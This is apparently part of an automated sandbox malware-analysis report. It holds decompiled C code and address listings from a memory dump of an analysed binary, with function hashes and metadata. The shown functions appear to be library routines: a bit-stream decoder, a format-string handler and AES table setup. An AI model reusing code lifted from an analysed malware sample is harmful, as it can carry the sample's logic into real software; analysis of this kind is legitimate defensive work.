								if(_t159 >=  *((intOrPtr*)(_t111 + 4 + _t72 * 4))) {
									_t131 = 0xf;
									_t73 = _t72 + 1;
									 *(_t171 + 0x10) = _t131;
									__eflags = _t73 - _t131;
									if(_t73 >= _t131) {
										L27:
										_t133 =  *(_t168 + 4) +  *(_t171 + 0x10);
										 *_t168 =  *_t168 + (_t133 >> 3);
										_t76 =  *(_t171 + 0x10);
										 *(_t168 + 4) = _t133 & 0x00000007;
										_t135 = 0x10;
										_t138 =  *((intOrPtr*)(_t111 + 0x44 + _t76 * 4)) + (_t159 -  *((intOrPtr*)(_t111 + _t76 * 4)) >> _t135 - _t76);
										__eflags = _t138 -  *_t111;
										asm("sbb eax, eax");
										_t77 = _t76 & _t138;
										__eflags = _t77;
										_t78 =  *(_t111 + 0xc88 + _t77 * 2) & 0x0000ffff;
										L28:
										__eflags = _t78 - 0x10;
										if(_t78 >= 0x10) {
											_t139 = _t168;
											__eflags = _t78 - 0x12;
											if(__eflags >= 0) {
												if(__eflags != 0) {
													_t114 = (E00A0A9EE(_t139) >> 9) + 0xb;
													__eflags = _t114;
													_push(7);
												} else {
													_t114 = (E00A0A9EE(_t139) >> 0xd) + 3;
													_push(3);
												}
												E00A0A9D7(_t168);
												while(1) {
													_t114 = _t114 - 1;
													__eflags = _t165 - 0x1ae;
													if(_t165 >= 0x1ae) {
														goto L46;
													}
													 *(_t171 + _t165 + 0x2c) = 0;
													_t165 = _t165 + 1;
													__eflags = _t114;
													if(_t114 != 0) {
														continue;
													}
													L44:
													_t111 =  *((intOrPtr*)(_t171 + 0x14));
													goto L45;
												}
												break;
											}
											__eflags = _t78 - 0x10;
											if(_t78 != 0x10) {
												_t121 = (E00A0A9EE(_t139) >> 9) + 0xb;
												__eflags = _t121;
												_push(7);
											} else {
												_t121 = (E00A0A9EE(_t139) >> 0xd) + 3;
												_push(3);
											}
											E00A0A9D7(_t168);
											__eflags = _t165;
											if(_t165 == 0) {
												L48:
												_t90 = 0;
												L50:
												L51:
												return _t90;
											} else {
												while(1) {
													_t121 = _t121 - 1;
													__eflags = _t165 - 0x1ae;
													if(_t165 >= 0x1ae) {
														goto L46;
													}
													 *(_t171 + _t165 + 0x2c) =  *((intOrPtr*)(_t171 + _t165 + 0x2b));
													_t165 = _t165 + 1;
													__eflags = _t121;
													if(_t121 != 0) {
														continue;
													}
													goto L44;
												}
												break;
											}
										}
										 *(_t171 + _t165 + 0x2c) = _t78;
										_t165 = _t165 + 1;
										goto L45;
									}
									_t150 = _t111 + (_t73 + 1) * 4;
									while(1) {
										__eflags = _t159 -  *_t150;
										if(_t159 <  *_t150) {
											break;
										}
										_t73 = _t73 + 1;
										_t150 = _t150 + 4;
										__eflags = _t73 - 0xf;
										if(_t73 < 0xf) {
											continue;
										}
										goto L27;
									}
									 *(_t171 + 0x10) = _t73;
									goto L27;
								}
								_t151 = 0x10;
								_t162 = _t159 >> _t151 - _t72;
								_t154 = ( *(_t162 + _t111 + 0x88) & 0x000000ff) +  *(_t168 + 4);
								 *_t168 =  *_t168 + (_t154 >> 3);
								 *(_t168 + 4) = _t154 & 0x00000007;
								_t78 =  *(_t111 + 0x488 + _t162 * 2) & 0x0000ffff;
								goto L28;
							}
							__eflags =  *_t168 -  *((intOrPtr*)(_t170 + 0x84)) - 5;
							if( *_t168 <=  *((intOrPtr*)(_t170 + 0x84)) - 5) {
								goto L19;
							}
							_t94 = E00A14A3C(_t170);
							__eflags = _t94;
							if(_t94 == 0) {
								goto L48;
							}
							goto L19;
							L45:
							__eflags = _t165 - 0x1ae;
						} while (_t165 < 0x1ae);
						L46:
						 *((char*)(_t170 + 0xe662)) = 1;
						__eflags =  *((char*)(_t168 + 8));
						if( *((char*)(_t168 + 8)) != 0) {
							L49:
							_t115 =  *((intOrPtr*)(_t171 + 0x1e8));
							_push(0x132);
							_push(_t115);
							_push(_t171 + 0x2c);
							E00A132D2();
							_push(0x40);
							_push(_t115 + 0xeec);
							_push(_t171 + 0x166);
							E00A132D2();
							_push(0x10);
							_push(_t115 + 0x1dd8);
							_push(_t171 + 0x1a6);
							E00A132D2();
							_push(0x2c);
							_push(_t115 + 0x2cc4);
							_push(_t171 + 0x1b6);
							E00A132D2();
							_t90 = 1;
							goto L50;
						}
						__eflags =  *_t168 -  *((intOrPtr*)(_t170 + 0x84));
						if( *_t168 <=  *((intOrPtr*)(_t170 + 0x84))) {
							goto L49;
						}
						goto L48;
					}
					__eflags =  *_t168 -  *((intOrPtr*)(__ecx + 0x84)) - 0x19;
					if( *_t168 <=  *((intOrPtr*)(__ecx + 0x84)) - 0x19) {
						goto L5;
					}
					_t90 = E00A14A3C(__ecx);
					__eflags = _t90;
					if(_t90 == 0) {
						goto L51;
					}
					goto L5;
				}
				return 1;
			}

































                                                        0x00a13fbd
                                                        0x00a13fbf
                                                        0x00a13fc9
                                                        0x00a13fd0
                                                        0x00a13fd4
                                                        0x00a13ff0
                                                        0x00a13ff1
                                                        0x00a13ff1
                                                        0x00a13ff4
                                                        0x00a14002
                                                        0x00a14005
                                                        0x00a1400a
                                                        0x00a1400d
                                                        0x00a14046
                                                        0x00000000
                                                        0x00a14046
                                                        0x00a1401d
                                                        0x00a14020
                                                        0x00a14025
                                                        0x00a14027
                                                        0x00a14030
                                                        0x00a14030
                                                        0x00a14033
                                                        0x00a14033
                                                        0x00a14034
                                                        0x00a14037
                                                        0x00000000
                                                        0x00000000
                                                        0x00a14039
                                                        0x00a1403e
                                                        0x00a1403f
                                                        0x00a14041
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a14041
                                                        0x00a14043
                                                        0x00000000
                                                        0x00a14043
                                                        0x00a14029
                                                        0x00a1404a
                                                        0x00a1404a
                                                        0x00a1404b
                                                        0x00a1404b
                                                        0x00a1405b
                                                        0x00a1405d
                                                        0x00a14065
                                                        0x00a14066
                                                        0x00a14067
                                                        0x00a1406b
                                                        0x00a14070
                                                        0x00a14070
                                                        0x00a14072
                                                        0x00a14072
                                                        0x00a14076
                                                        0x00a14094
                                                        0x00a14096
                                                        0x00a1409d
                                                        0x00a140a3
                                                        0x00a140a9
                                                        0x00a140ad
                                                        0x00a140da
                                                        0x00a140db
                                                        0x00a140dc
                                                        0x00a140e0
                                                        0x00a140e2
                                                        0x00a140fd
                                                        0x00a14100
                                                        0x00a1410c
                                                        0x00a1410e
                                                        0x00a14112
                                                        0x00a14117
                                                        0x00a14123
                                                        0x00a14125
                                                        0x00a14127
                                                        0x00a14129
                                                        0x00a14129
                                                        0x00a1412b
                                                        0x00a14133
                                                        0x00a14133
                                                        0x00a14136
                                                        0x00a14142
                                                        0x00a14144
                                                        0x00a14147
                                                        0x00a14191
                                                        0x00a141ae
                                                        0x00a141ae
                                                        0x00a141b1
                                                        0x00a14193
                                                        0x00a1419d
                                                        0x00a141a0
                                                        0x00a141a0
                                                        0x00a141b5
                                                        0x00a141ba
                                                        0x00a141ba
                                                        0x00a141bb
                                                        0x00a141c1
                                                        0x00000000
                                                        0x00000000
                                                        0x00a141c3
                                                        0x00a141c8
                                                        0x00a141c9
                                                        0x00a141cb
                                                        0x00000000
                                                        0x00000000
                                                        0x00a141cd
                                                        0x00a141cd
                                                        0x00000000
                                                        0x00a141cd
                                                        0x00000000
                                                        0x00a141ba
                                                        0x00a14149
                                                        0x00a1414c
                                                        0x00a14169
                                                        0x00a14169
                                                        0x00a1416c
                                                        0x00a1414e
                                                        0x00a14158
                                                        0x00a1415b
                                                        0x00a1415b
                                                        0x00a14170
                                                        0x00a14175
                                                        0x00a14177
                                                        0x00a141f4
                                                        0x00a141f4
                                                        0x00a1425b
                                                        0x00a1425d
                                                        0x00000000
                                                        0x00a14179
                                                        0x00a14179
                                                        0x00a14179
                                                        0x00a1417a
                                                        0x00a14180
                                                        0x00000000
                                                        0x00000000
                                                        0x00a14186
                                                        0x00a1418a
                                                        0x00a1418b
                                                        0x00a1418d
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1418f
                                                        0x00000000
                                                        0x00a14179
                                                        0x00a14177
                                                        0x00a14138
                                                        0x00a1413c
                                                        0x00000000
                                                        0x00a1413c
                                                        0x00a140e7
                                                        0x00a140ea
                                                        0x00a140ea
                                                        0x00a140ec
                                                        0x00000000
                                                        0x00000000
                                                        0x00a140ee
                                                        0x00a140ef
                                                        0x00a140f2
                                                        0x00a140f5
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a140f7
                                                        0x00a140f9
                                                        0x00000000
                                                        0x00a140f9
                                                        0x00a140b1
                                                        0x00a140b4
                                                        0x00a140be
                                                        0x00a140c6
                                                        0x00a140cb
                                                        0x00a140ce
                                                        0x00000000
                                                        0x00a140ce
                                                        0x00a14081
                                                        0x00a14083
                                                        0x00000000
                                                        0x00000000
                                                        0x00a14087
                                                        0x00a1408c
                                                        0x00a1408e
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a141d1
                                                        0x00a141d1
                                                        0x00a141d1
                                                        0x00a141dd
                                                        0x00a141dd
                                                        0x00a141e4
                                                        0x00a141e8
                                                        0x00a141f8
                                                        0x00a141f8
                                                        0x00a14203
                                                        0x00a14208
                                                        0x00a14209
                                                        0x00a1420c
                                                        0x00a14211
                                                        0x00a1421b
                                                        0x00a14223
                                                        0x00a14224
                                                        0x00a14229
                                                        0x00a14233
                                                        0x00a1423b
                                                        0x00a1423c
                                                        0x00a14241
                                                        0x00a14249
                                                        0x00a14251
                                                        0x00a14254
                                                        0x00a14259
                                                        0x00000000
                                                        0x00a14259
                                                        0x00a141ec
                                                        0x00a141f2
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a141f2
                                                        0x00a13fdf
                                                        0x00a13fe1
                                                        0x00000000
                                                        0x00000000
                                                        0x00a13fe3
                                                        0x00a13fe8
                                                        0x00a13fea
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a13fea
                                                        0x00000000

                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7143b401136632ee41cc728dc3e906afaa0c283aea16f65d0c64829696432638
                                                        • Instruction ID: 048e8bbd3c15c7327a064538038df9db4e6cea059c9fc63fad8a0f49f298f7f5
                                                        • Opcode Fuzzy Hash: 7143b401136632ee41cc728dc3e906afaa0c283aea16f65d0c64829696432638
                                                        • Instruction Fuzzy Hash: 057148713043456BDB34DF2DC9D1BED77E1ABB9344F000A2DEA868B282DA7889C5C756
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A24A0A Relevance: .2, Instructions: 214COMMONLIBRARYCODECrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 88%
                                                        			E00A24A0A(void* __ecx) {
				char _v6;
				char _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				char _t49;
				signed int _t50;
				void* _t51;
				signed char _t54;
				signed char _t56;
				signed int _t57;
				signed int _t58;
				signed char _t67;
				signed char _t69;
				signed char _t71;
				signed char _t80;
				signed char _t82;
				signed int _t84;
				signed int _t86;
				signed int _t87;
				signed char _t92;
				void* _t95;
				intOrPtr _t100;
				unsigned int _t102;
				signed char _t104;
				void* _t112;
				unsigned int _t113;
				void* _t114;
				signed int _t115;
				signed int* _t116;
				void* _t119;
				void* _t121;
				void* _t122;
				void* _t124;
				void* _t125;

				_push(__ecx);
				_t119 = __ecx;
				_t92 = 1;
				_t49 =  *((char*)(__ecx + 0x31));
				_t124 = _t49 - 0x64;
				if(_t124 > 0) {
					__eflags = _t49 - 0x70;
					if(__eflags > 0) {
						_t50 = _t49 - 0x73;
						__eflags = _t50;
						if(_t50 == 0) {
							L9:
							_t51 = E00A255F8(_t119);
							L10:
							if(_t51 != 0) {
								__eflags =  *((char*)(_t119 + 0x30));
								if( *((char*)(_t119 + 0x30)) == 0) {
									_t113 =  *(_t119 + 0x20);
									_push(_t114);
									_v8 = 0;
									_t115 = 0;
									_v6 = 0;
									_t54 = _t113 >> 4;
									__eflags = _t92 & _t54;
									if((_t92 & _t54) == 0) {
										L46:
										_t100 =  *((intOrPtr*)(_t119 + 0x31));
										__eflags = _t100 - 0x78;
										if(_t100 == 0x78) {
											L48:
											_t56 = _t113 >> 5;
											__eflags = _t92 & _t56;
											if((_t92 & _t56) != 0) {
												L50:
												__eflags = _t100 - 0x61;
												if(_t100 == 0x61) {
													L53:
													_t57 = 1;
													L54:
													__eflags = _t92;
													if(_t92 != 0) {
														L56:
														 *((char*)(_t121 + _t115 - 4)) = 0x30;
														__eflags = _t100 - 0x58;
														if(_t100 == 0x58) {
															L59:
															_t58 = 1;
															L60:
															__eflags = _t58;
															 *((char*)(_t121 + _t115 - 3)) = ((_t58 & 0xffffff00 | _t58 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
															_t115 = _t115 + 2;
															__eflags = _t115;
															L61:
															_t95 =  *((intOrPtr*)(_t119 + 0x24)) -  *((intOrPtr*)(_t119 + 0x38)) - _t115;
															__eflags = _t113 & 0x0000000c;
															if((_t113 & 0x0000000c) == 0) {
																E00A23ED4(_t119 + 0x448, 0x20, _t95, _t119 + 0x18);
																_t122 = _t122 + 0x10;
															}
															E00A258F3(_t119 + 0x448,  &_v8, _t115, _t119 + 0x18,  *((intOrPtr*)(_t119 + 0xc)));
															_t102 =  *(_t119 + 0x20);
															_t116 = _t119 + 0x18;
															_t67 = _t102 >> 3;
															__eflags = _t67 & 0x00000001;
															if((_t67 & 0x00000001) != 0) {
																_t104 = _t102 >> 2;
																__eflags = _t104 & 0x00000001;
																if((_t104 & 0x00000001) == 0) {
																	E00A23ED4(_t119 + 0x448, 0x30, _t95, _t116);
																	_t122 = _t122 + 0x10;
																}
															}
															E00A257C1(_t95, _t119, _t116, _t119, 0);
															__eflags =  *_t116;
															if( *_t116 >= 0) {
																_t71 =  *(_t119 + 0x20) >> 2;
																__eflags = _t71 & 0x00000001;
																if((_t71 & 0x00000001) != 0) {
																	E00A23ED4(_t119 + 0x448, 0x20, _t95, _t116);
																}
															}
															_t69 = 1;
															L70:
															return _t69;
														}
														__eflags = _t100 - 0x41;
														if(_t100 == 0x41) {
															goto L59;
														}
														_t58 = 0;
														goto L60;
													}
													__eflags = _t57;
													if(_t57 == 0) {
														goto L61;
													}
													goto L56;
												}
												__eflags = _t100 - 0x41;
												if(_t100 == 0x41) {
													goto L53;
												}
												_t57 = 0;
												goto L54;
											}
											L49:
											_t92 = 0;
											__eflags = 0;
											goto L50;
										}
										__eflags = _t100 - 0x58;
										if(_t100 != 0x58) {
											goto L49;
										}
										goto L48;
									}
									_t80 = _t113 >> 6;
									__eflags = _t92 & _t80;
									if((_t92 & _t80) == 0) {
										__eflags = _t92 & _t113;
										if((_t92 & _t113) == 0) {
											_t82 = _t113 >> 1;
											__eflags = _t92 & _t82;
											if((_t92 & _t82) == 0) {
												goto L46;
											}
											_v8 = 0x20;
											L45:
											_t115 = _t92;
											goto L46;
										}
										_v8 = 0x2b;
										goto L45;
									}
									_v8 = 0x2d;
									goto L45;
								}
								_t69 = _t92;
								goto L70;
							}
							L11:
							_t69 = 0;
							goto L70;
						}
						_t84 = _t50;
						__eflags = _t84;
						if(__eflags == 0) {
							L28:
							_push(0);
							_push(0xa);
							L29:
							_t51 = E00A25403(_t119, _t114, __eflags);
							goto L10;
						}
						__eflags = _t84 - 3;
						if(__eflags != 0) {
							goto L11;
						}
						_push(0);
						L13:
						_push(0x10);
						goto L29;
					}
					if(__eflags == 0) {
						_t51 = E00A255E0(__ecx);
						goto L10;
					}
					__eflags = _t49 - 0x67;
					if(_t49 <= 0x67) {
						L30:
						_t51 = E00A2500F(_t92, _t119);
						goto L10;
					}
					__eflags = _t49 - 0x69;
					if(_t49 == 0x69) {
						L27:
						_t2 = _t119 + 0x20;
						 *_t2 =  *(_t119 + 0x20) | 0x00000010;
						__eflags =  *_t2;
						goto L28;
					}
					__eflags = _t49 - 0x6e;
					if(_t49 == 0x6e) {
						_t51 = E00A2554D(__ecx, _t112);
						goto L10;
					}
					__eflags = _t49 - 0x6f;
					if(_t49 != 0x6f) {
						goto L11;
					}
					_t51 = E00A255C1(__ecx);
					goto L10;
				}
				if(_t124 == 0) {
					goto L27;
				}
				_t125 = _t49 - 0x58;
				if(_t125 > 0) {
					_t86 = _t49 - 0x5a;
					__eflags = _t86;
					if(_t86 == 0) {
						_t51 = E00A24F49(__ecx);
						goto L10;
					}
					_t87 = _t86 - 7;
					__eflags = _t87;
					if(_t87 == 0) {
						goto L30;
					}
					__eflags = _t87;
					if(__eflags != 0) {
						goto L11;
					}
					L17:
					_t51 = E00A252DB(_t92, _t119, __eflags, 0);
					goto L10;
				}
				if(_t125 == 0) {
					_push(1);
					goto L13;
				}
				if(_t49 == 0x41) {
					goto L30;
				}
				if(_t49 == 0x43) {
					goto L17;
				}
				if(_t49 <= 0x44) {
					goto L11;
				}
				if(_t49 <= 0x47) {
					goto L30;
				}
				if(_t49 != 0x53) {
					goto L11;
				}
				goto L9;
			}






































                                                        0x00a24a0f
                                                        0x00a24a12
                                                        0x00a24a16
                                                        0x00a24a19
                                                        0x00a24a1d
                                                        0x00a24a20
                                                        0x00a24a8e
                                                        0x00a24a91
                                                        0x00a24ae0
                                                        0x00a24ae0
                                                        0x00a24ae3
                                                        0x00a24a50
                                                        0x00a24a52
                                                        0x00a24a57
                                                        0x00a24a59
                                                        0x00a24afe
                                                        0x00a24b02
                                                        0x00a24b0b
                                                        0x00a24b10
                                                        0x00a24b11
                                                        0x00a24b15
                                                        0x00a24b17
                                                        0x00a24b1c
                                                        0x00a24b1f
                                                        0x00a24b21
                                                        0x00a24b4a
                                                        0x00a24b4a
                                                        0x00a24b4d
                                                        0x00a24b50
                                                        0x00a24b57
                                                        0x00a24b59
                                                        0x00a24b5c
                                                        0x00a24b5e
                                                        0x00a24b62
                                                        0x00a24b62
                                                        0x00a24b65
                                                        0x00a24b70
                                                        0x00a24b70
                                                        0x00a24b72
                                                        0x00a24b72
                                                        0x00a24b74
                                                        0x00a24b7a
                                                        0x00a24b7a
                                                        0x00a24b7f
                                                        0x00a24b82
                                                        0x00a24b8d
                                                        0x00a24b8d
                                                        0x00a24b8f
                                                        0x00a24b8f
                                                        0x00a24b9a
                                                        0x00a24b9e
                                                        0x00a24b9e
                                                        0x00a24ba1
                                                        0x00a24ba7
                                                        0x00a24ba9
                                                        0x00a24bac
                                                        0x00a24bbc
                                                        0x00a24bc1
                                                        0x00a24bc1
                                                        0x00a24bd6
                                                        0x00a24bdb
                                                        0x00a24bde
                                                        0x00a24be3
                                                        0x00a24be6
                                                        0x00a24be8
                                                        0x00a24bea
                                                        0x00a24bed
                                                        0x00a24bf0
                                                        0x00a24bfd
                                                        0x00a24c02
                                                        0x00a24c02
                                                        0x00a24bf0
                                                        0x00a24c09
                                                        0x00a24c0e
                                                        0x00a24c11
                                                        0x00a24c16
                                                        0x00a24c19
                                                        0x00a24c1b
                                                        0x00a24c28
                                                        0x00a24c2d
                                                        0x00a24c1b
                                                        0x00a24c30
                                                        0x00a24c33
                                                        0x00a24c38
                                                        0x00a24c38
                                                        0x00a24b84
                                                        0x00a24b87
                                                        0x00000000
                                                        0x00000000
                                                        0x00a24b89
                                                        0x00000000
                                                        0x00a24b89
                                                        0x00a24b76
                                                        0x00a24b78
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a24b78
                                                        0x00a24b67
                                                        0x00a24b6a
                                                        0x00000000
                                                        0x00000000
                                                        0x00a24b6c
                                                        0x00000000
                                                        0x00a24b6c
                                                        0x00a24b60
                                                        0x00a24b60
                                                        0x00a24b60
                                                        0x00000000
                                                        0x00a24b60
                                                        0x00a24b52
                                                        0x00a24b55
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a24b55
                                                        0x00a24b25
                                                        0x00a24b28
                                                        0x00a24b2a
                                                        0x00a24b32
                                                        0x00a24b34
                                                        0x00a24b3e
                                                        0x00a24b40
                                                        0x00a24b42
                                                        0x00000000
                                                        0x00000000
                                                        0x00a24b44
                                                        0x00a24b48
                                                        0x00a24b48
                                                        0x00000000
                                                        0x00a24b48
                                                        0x00a24b36
                                                        0x00000000
                                                        0x00a24b36
                                                        0x00a24b2c
                                                        0x00000000
                                                        0x00a24b2c
                                                        0x00a24b04
                                                        0x00000000
                                                        0x00a24b04
                                                        0x00a24a5f
                                                        0x00a24a5f
                                                        0x00000000
                                                        0x00a24a5f
                                                        0x00a24aea
                                                        0x00a24aea
                                                        0x00a24aed
                                                        0x00a24abf
                                                        0x00a24abf
                                                        0x00a24ac0
                                                        0x00a24ac2
                                                        0x00a24ac4
                                                        0x00000000
                                                        0x00a24ac4
                                                        0x00a24aef
                                                        0x00a24af2
                                                        0x00000000
                                                        0x00000000
                                                        0x00a24af8
                                                        0x00a24a67
                                                        0x00a24a67
                                                        0x00000000
                                                        0x00a24a67
                                                        0x00a24a93
                                                        0x00a24ad6
                                                        0x00000000
                                                        0x00a24ad6
                                                        0x00a24a95
                                                        0x00a24a98
                                                        0x00a24acb
                                                        0x00a24acd
                                                        0x00000000
                                                        0x00a24acd
                                                        0x00a24a9a
                                                        0x00a24a9d
                                                        0x00a24abb
                                                        0x00a24abb
                                                        0x00a24abb
                                                        0x00a24abb
                                                        0x00000000
                                                        0x00a24abb
                                                        0x00a24a9f
                                                        0x00a24aa2
                                                        0x00a24ab4
                                                        0x00000000
                                                        0x00a24ab4
                                                        0x00a24aa4
                                                        0x00a24aa7
                                                        0x00000000
                                                        0x00000000
                                                        0x00a24aab
                                                        0x00000000
                                                        0x00a24aab
                                                        0x00a24a22
                                                        0x00000000
                                                        0x00000000
                                                        0x00a24a28
                                                        0x00a24a2b
                                                        0x00a24a6b
                                                        0x00a24a6b
                                                        0x00a24a6e
                                                        0x00a24a87
                                                        0x00000000
                                                        0x00a24a87
                                                        0x00a24a70
                                                        0x00a24a70
                                                        0x00a24a73
                                                        0x00000000
                                                        0x00000000
                                                        0x00a24a76
                                                        0x00a24a79
                                                        0x00000000
                                                        0x00000000
                                                        0x00a24a7b
                                                        0x00a24a7e
                                                        0x00000000
                                                        0x00a24a7e
                                                        0x00a24a2d
                                                        0x00a24a66
                                                        0x00000000
                                                        0x00a24a66
                                                        0x00a24a32
                                                        0x00000000
                                                        0x00000000
                                                        0x00a24a3b
                                                        0x00000000
                                                        0x00000000
                                                        0x00a24a40
                                                        0x00000000
                                                        0x00000000
                                                        0x00a24a45
                                                        0x00000000
                                                        0x00000000
                                                        0x00a24a4e
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000

                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
                                                        • Instruction ID: fbee4ef6fa630e40f4b1c31c85aba136ab3d071f3785267657253a58b13f9a2c
                                                        • Opcode Fuzzy Hash: 5deea3b29f66a918188f7a75532971316276c2599c24e1ebb0fa75850081f94e
                                                        • Instruction Fuzzy Hash: 6751A971A84B7447DF388B7CB6567BF67DA9B1E380F180539E842CB282C614DE458359
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A0E147 Relevance: .2, Instructions: 190COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 97%
                                                        			E00A0E147() {
				intOrPtr _v8;
				char _v521;
				char _t140;
				signed int _t154;
				signed int _t155;
				signed int _t159;
				signed int _t160;
				signed int _t161;
				signed int _t162;
				signed int _t179;
				signed int _t181;
				signed char _t192;
				signed int _t199;
				signed int _t207;
				void* _t208;
				signed int _t209;
				signed char _t211;
				signed int _t219;
				void* _t220;

				_t140 = 0;
				_t179 = 1;
				_t207 = 1;
				do {
					 *(_t220 + _t140 - 0x304) = _t207;
					 *(_t220 + _t140 - 0x205) = _t207;
					 *((char*)(_t220 + _t207 - 0x104)) = _t140;
					_v8 = _t140 + 1;
					asm("sbb ecx, ecx");
					_t140 = _v8;
					_t207 = _t207 ^  ~(_t207 & 0x80) & 0x0000011b ^ _t207 + _t207;
				} while (_t207 != 1);
				_t208 = 0;
				do {
					 *(_t208 + 0xa451a0) = _t179;
					asm("sbb ecx, ecx");
					_t179 = _t179 + _t179 ^  ~(_t179 & 0x80) & 0x0000011b;
					_t208 = _t208 + 1;
				} while (_t208 < 0x1e);
				_t181 = 0;
				do {
					if(_t181 == 0) {
						_t209 = 0;
					} else {
						_t209 =  *( &_v521 - ( *(_t220 + (_t181 & 0x000000ff) - 0x104) & 0x000000ff)) & 0x000000ff;
					}
					_t192 = (_t209 ^ (((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) + ((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) ^ _t209) + (((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) + ((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) ^ _t209) ^ 0x00006300) >> 0x00000008 ^ _t209 ^ (((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) + ((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) ^ _t209) + (((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) + ((_t209 + _t209 ^ _t209) + (_t209 + _t209 ^ _t209) ^ _t209) ^ _t209);
					 *(_t181 + 0xa44fa0) = _t192;
					 *(0xa45dc1 + _t181 * 4) = _t192;
					 *(0xa45dc0 + _t181 * 4) = _t192;
					 *(0xa459c3 + _t181 * 4) = _t192;
					 *(0xa459c0 + _t181 * 4) = _t192;
					 *(0xa455c3 + _t181 * 4) = _t192;
					 *(0xa455c2 + _t181 * 4) = _t192;
					 *(0xa451c2 + _t181 * 4) = _t192;
					 *(0xa451c1 + _t181 * 4) = _t192;
					if(_t192 == 0) {
						_t154 = 0;
					} else {
						_t154 =  *(_t220 + ( *(_t220 + (_t192 & 0x000000ff) - 0x104) & 0x000000ff) - 0x2eb) & 0x000000ff;
					}
					 *(0xa45dc3 + _t181 * 4) = _t154;
					 *(0xa459c2 + _t181 * 4) = _t154;
					 *(0xa455c1 + _t181 * 4) = _t154;
					 *(0xa451c0 + _t181 * 4) = _t154;
					if(_t192 == 0) {
						_t155 = 0;
					} else {
						_t155 =  *(_t220 + ( *(_t220 + (_t192 & 0x000000ff) - 0x104) & 0x000000ff) - 0x303) & 0x000000ff;
					}
					_t219 = _t181 & 0x000000ff;
					 *(0xa45dc2 + _t181 * 4) = _t155;
					 *(0xa459c1 + _t181 * 4) = _t155;
					 *(0xa455c0 + _t181 * 4) = _t155;
					 *(0xa451c3 + _t181 * 4) = _t155;
					if((((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219) + ((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219) >> 0x00000008 ^ ((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219) + ((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219)) == 5) {
						_t211 = 0;
					} else {
						_t211 =  *((intOrPtr*)( &_v521 - ( *(_t220 + (((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219) + ((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219) >> 0x00000008 & 0x000000ff ^ ((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219) + ((_t219 << 0x00000003 ^ _t219) << 0x00000002 ^ _t219) & 0x000000ff ^ 0x00000005) - 0x104) & 0x000000ff)));
					}
					 *(_t181 + 0xa450a0) = _t211;
					if(_t211 == 0) {
						_t159 = 0;
					} else {
						_t159 =  *(_t220 + ( *(_t220 + (_t211 & 0x000000ff) - 0x104) & 0x000000ff) - 0x29c) & 0x000000ff;
					}
					_t199 = _t211 & 0x000000ff;
